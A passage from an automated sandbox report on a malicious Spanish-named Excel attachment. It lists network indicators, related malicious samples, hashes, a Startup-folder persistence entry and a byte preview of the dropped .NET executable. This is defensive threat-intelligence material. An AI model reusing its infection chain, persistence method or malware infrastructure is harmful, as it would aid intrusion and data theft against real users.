                                                                                                                                                            64425SKB-ENTERPRISENLfalse
                                                                                                                                                            54.225.220.115
                                                                                                                                                            unknownUnited States
                                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                                            185.199.108.133
                                                                                                                                                            unknownNetherlands
                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                            208.91.199.223
                                                                                                                                                            unknownUnited States
                                                                                                                                                            394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                            185.162.146.6
                                                                                                                                                            unknownTurkey
                                                                                                                                                            60721BURSABILTRfalse

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                            Analysis ID:356267
                                                                                                                                                            Start date:22.02.2021
                                                                                                                                                            Start time:20:33:48
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 12m 12s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:light
                                                                                                                                                            Sample file name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                                            Number of analysed new started processes analysed:27
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • GSI enabled (VBA)
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                                                                                                                            • Quality average: 88%
                                                                                                                                                            • Quality standard deviation: 8.5%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 97%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                                                            • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer
                                                                                                                                                            Warnings:
                                                                                                                                                            Show All
                                                                                                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 51.104.139.180, 13.64.90.137, 13.107.5.88, 13.107.42.23, 104.43.139.144, 23.210.249.50, 184.30.21.144, 52.147.198.201, 104.43.193.48, 52.109.32.63, 52.109.12.23, 52.109.76.34, 2.20.142.210, 2.20.142.209, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
                                                                                                                                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, prod-w.nexus.live.com.akadns.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, l-0014.l-msedge.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            20:35:03API Interceptor269x Sleep call for process: a.exe modified
                                                                                                                                                            20:35:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            20:35:36API Interceptor29x Sleep call for process: powershell.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            45.148.121.68Vessel Line Up 7105082938.exeGet hashmaliciousBrowse
                                                                                                                                                            • pastex.pro/b/gmtdfmhFj
                                                                                                                                                            dwg.exeGet hashmaliciousBrowse
                                                                                                                                                            • pastex.pro/b/rTfceghKr
                                                                                                                                                            54.225.220.1152e00000.dllGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/?format=xml
                                                                                                                                                            0112_80556334.docGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/
                                                                                                                                                            0112_528419802.docGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/
                                                                                                                                                            Our New Order Jan 12 2020 at 2.30_PVV940_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/
                                                                                                                                                            SecuriteInfo.com.Mal.Generic-S.23822.exeGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/
                                                                                                                                                            nwamamassloga.exeGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/
                                                                                                                                                            TIRNAK.exeGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/
                                                                                                                                                            ZfiNFIGegX.exeGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/?format=xml
                                                                                                                                                            26-11-20_Dhl_Signed_document-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • api.ipify.org/

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            elb097307-934924932.us-east-1.elb.amazonaws.comnigolas.exeGet hashmaliciousBrowse
                                                                                                                                                            • 50.19.96.218
                                                                                                                                                            RTM DIAS - CTM.exeGet hashmaliciousBrowse
                                                                                                                                                            • 54.235.142.93
                                                                                                                                                            NitroGenerator.exeGet hashmaliciousBrowse
                                                                                                                                                            • 54.225.66.103
                                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 23.21.76.253
                                                                                                                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.235.142.93
                                                                                                                                                            Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.221.253.252
                                                                                                                                                            Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.235.83.248
                                                                                                                                                            Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.235.83.248
                                                                                                                                                            BANK SWIFT- USD 98,712.00.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 23.21.126.66
                                                                                                                                                            Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.221.253.252
                                                                                                                                                            drWcfynA5k.exeGet hashmaliciousBrowse
                                                                                                                                                            • 54.235.83.248
                                                                                                                                                            Purchase Order KVRQ-743012021.docGet hashmaliciousBrowse
                                                                                                                                                            • 23.21.48.44
                                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.21085.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 23.21.126.66
                                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.29300.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.235.83.248
                                                                                                                                                            0217_1737094153981.docGet hashmaliciousBrowse
                                                                                                                                                            • 54.221.253.252
                                                                                                                                                            DocuSign_167.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 23.21.76.253
                                                                                                                                                            SecuriteInfo.com.CAP_HookExKeylogger.18513.exeGet hashmaliciousBrowse
                                                                                                                                                            • 23.21.76.253
                                                                                                                                                            SecuriteInfo.com.Variant.Bulz.361092.7175.exeGet hashmaliciousBrowse
                                                                                                                                                            • 50.19.252.36
                                                                                                                                                            Hs52qascx.dllGet hashmaliciousBrowse
                                                                                                                                                            • 50.19.252.36
                                                                                                                                                            DocuSign_139380140_1184163298.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.225.220.115
                                                                                                                                                            pastex.proVessel Line Up 7105082938.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.121.68
                                                                                                                                                            dwg.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.121.68
                                                                                                                                                            us2.smtp.mailhostbox.comSecuriteInfo.com.Trojan.Packed2.42850.3598.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.225
                                                                                                                                                            SecuriteInfo.com.Trojan.Inject4.6572.1879.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            SWIFT Payment W0301.docGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.225
                                                                                                                                                            ffkjg5CVrO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.143
                                                                                                                                                            7Lf8J7h7os.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.223
                                                                                                                                                            Shipping Details_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.143
                                                                                                                                                            YKRAB010B_KHE_Preminary Packing List.xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.225
                                                                                                                                                            RTM DIAS - CTM.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.143
                                                                                                                                                            AWB & Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.223
                                                                                                                                                            AWB & Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.143
                                                                                                                                                            PAYMENT INVOICE-9876543456789.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            SecuriteInfo.com.Artemis249E62CF9BAE.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.143
                                                                                                                                                            inquiry.docGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            SOA.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            SecuriteInfo.com.Artemis1A08A3826D57.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.225
                                                                                                                                                            BL COPY.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.143
                                                                                                                                                            ELASTA-PL-INV-2021024.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.225
                                                                                                                                                            SecuriteInfo.com.CAP_HookExKeylogger.31203.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            SWIFT COPY $27,078.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.225
                                                                                                                                                            SWIFT COPY 27078.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224

                                                                                                                                                            ASN

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            AMAZON-AESUSnigolas.exeGet hashmaliciousBrowse
                                                                                                                                                            • 50.19.96.218
                                                                                                                                                            X1(1).xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 34.226.34.190
                                                                                                                                                            X1(1).xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 100.24.200.179
                                                                                                                                                            X1(1).xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 52.200.32.3
                                                                                                                                                            IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                                                                                                                            • 3.223.115.185
                                                                                                                                                            message_zdm (2).htmlGet hashmaliciousBrowse
                                                                                                                                                            • 52.44.242.176
                                                                                                                                                            002.docxGet hashmaliciousBrowse
                                                                                                                                                            • 34.192.7.28
                                                                                                                                                            002.docxGet hashmaliciousBrowse
                                                                                                                                                            • 52.20.197.7
                                                                                                                                                            Small Charities.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 3.229.228.113
                                                                                                                                                            Small Charities.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 3.209.197.155
                                                                                                                                                            CX2 RFQ.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 34.226.34.190
                                                                                                                                                            CX2 RFQ.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 52.200.32.3
                                                                                                                                                            CX2 RFQ.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 100.24.200.179
                                                                                                                                                            RTM DIAS - CTM.exeGet hashmaliciousBrowse
                                                                                                                                                            • 54.235.142.93
                                                                                                                                                            avast_secure_browser_setup.exeGet hashmaliciousBrowse
                                                                                                                                                            • 54.164.225.86
                                                                                                                                                            AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 52.0.217.44
                                                                                                                                                            NitroGenerator.exeGet hashmaliciousBrowse
                                                                                                                                                            • 54.225.66.103
                                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 23.21.76.253
                                                                                                                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.235.142.93
                                                                                                                                                            Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 54.221.253.252
                                                                                                                                                            SKB-ENTERPRISENLVessel Line Up 7105082938.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.121.68
                                                                                                                                                            dwg.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.121.68
                                                                                                                                                            carirstlite.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.153
                                                                                                                                                            LA99293P02.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.121.138
                                                                                                                                                            p1nY2hwmIl.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.173
                                                                                                                                                            c4kSaiN1ja.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.173
                                                                                                                                                            zKOi8vCorq.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.173
                                                                                                                                                            w3QgrgNAWs.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.173
                                                                                                                                                            yWWZnMPf9D.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.173
                                                                                                                                                            B5qp0eVSkw.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.173
                                                                                                                                                            Lz8lkpUFxJ.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142
                                                                                                                                                            mMqGgKfeL6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142
                                                                                                                                                            IIhgjzqAwH.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142
                                                                                                                                                            MyBNQ4qrLn.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142
                                                                                                                                                            e4vMDSPGNX.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142
                                                                                                                                                            qA655H06I0.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142
                                                                                                                                                            XAwxv0OlTG.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.173
                                                                                                                                                            wIKefPv0H6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142
                                                                                                                                                            C9pzzdQD2W.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142
                                                                                                                                                            n0a5os44N8.exeGet hashmaliciousBrowse
                                                                                                                                                            • 45.148.120.142

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0emuOvK6dngg.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            SKBM 0222..exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Vessel Line Up 7105082938.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            ProtonVPN.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            PO 86540.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            RTM DIAS - CTM.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            uTorrent.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            hreheh.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            JFAaEh5hB6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Dmjsru7tdt.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Documents_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            BANK SWIFT- USD 98,712.00.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            BMfiIGROO2.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            dwg.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Q8XSs7tx9Y.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            VYTqKrm2vw.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            QzV0wbwrxW.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Inv_874520.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Inv_95736.scr.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            drWcfynA5k.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            receipt145.htmGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            xerox for hycite.htmGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            Muligheds.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            DHL_6368638172 documento de recibo,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            PDF.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            pagamento.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            message_zdm (2).htmlGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            Statement-ID28865611496334.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            Statement-ID21488878391791.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            frank_2021-02-22_02-03.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            Statement-ID72347595684775.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            MR52.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            Scan_medcal equipment sample_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            rfq02212021.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            RE ICA 40 Sdn Bhd- Purchase Order#6769704.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            RFQ-#09503.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            RFQ_1101983736366355 1101938377388.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6
                                                                                                                                                            Offer Request 6100003768.exeGet hashmaliciousBrowse
                                                                                                                                                            • 185.162.146.6

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\ProgramData\a.exe
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):129536
                                                                                                                                                            Entropy (8bit):3.949382785719168
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:gHLIU+PDy4GL3Uuwu8uIufFGPIEgB/rCMApfxMwhOJaTSpjfK75rT2C+BHyjdDC/:icZy4GLR/BaDauDvLW7p
                                                                                                                                                            MD5:7D9D8812398EAF9AC0D85E728BBF8637
                                                                                                                                                            SHA1:C87EA3136E5941B9EBA79BB4621CAAFA7B65A462
                                                                                                                                                            SHA-256:F0A487567534A44C564D2658C7A525E828B985DE773A4F513B3F0CDF10C09BDC
                                                                                                                                                            SHA-512:DCC278E46E59913777DA5D49636D77BBAE06C7F9DA24C7DED43075A6F57702A2F1EDF8CEF4C1A767F2E6B529707EF0386685E86A44BFC75128946C27DB13C5E3
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0.................. ... ....@.. .......................`............@.................................e...O.... ..h....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...h.... ......................@..@.reloc.......@......................@..B........................H...........L9..........h...p...........................................~..}.....(.......(.......(.....*.0...........#..........(....r...p(.....s.......{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#........7..#........7..#..........+......,T...#.......@(....Z.[.....(.......{......( ...o!......r'..p..( ...r1..p("...o#.....+..r7..p($...&..8.....{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#.....
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a.exe.log
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1216
                                                                                                                                                            Entropy (8bit):5.355304211458859
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):132891
                                                                                                                                                            Entropy (8bit):5.375886783043812
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:FcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:RcQ9DQW+z0XiK
                                                                                                                                                            MD5:0D643781628FC550743656F163B7B2C0
                                                                                                                                                            SHA1:03C6A85CDA29B28F86A475E6A57C31A55E8FD41D
                                                                                                                                                            SHA-256:A5CFE9B472F67D9011F42812EA1D5792B537FD56CD35791CD12BBF05967628C0
                                                                                                                                                            SHA-512:C192C591AD82E0CE03AA9BB4837ADB5D83B7642D98F1399F62C5A6AC338337F92D13A484B4D6CAA26007B723D85AA0AE9463658028D1D8591BB7F9D827E1AE4F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-22T19:34:48">.. Build: 16.0.13817.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):129536
                                                                                                                                                            Entropy (8bit):3.949382785719168
                                                                                                                                                            Encrypted:false
